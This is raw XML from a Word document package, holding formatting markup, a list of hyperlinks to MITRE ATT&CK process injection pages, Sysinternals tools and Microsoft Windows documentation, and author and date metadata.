                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1093478044">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="-420"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="896741741">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="814571214">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="614098354">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="309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6679">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="-420"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1426267867">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1734962122">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1072773890">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1273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ack.mitre.org/techniques/T1055/012/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/001/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/memory/virtual-address-space" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/0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rocesshacker/processhacker"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lbas-project.github.io" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/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yperlink" Target="https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key"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earn.microsoft.com/en-us/windows/win32/eventlog/event-types" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/013/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/memory/address-windowing-extensions"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hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_environment_variables?view=powershell-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5100-7948-40F4-A25E-6C0914C1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3</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obeih</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ali Sobeih</cp:lastModifiedBy>
  <cp:revision>90</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-06T14:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-30T21:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>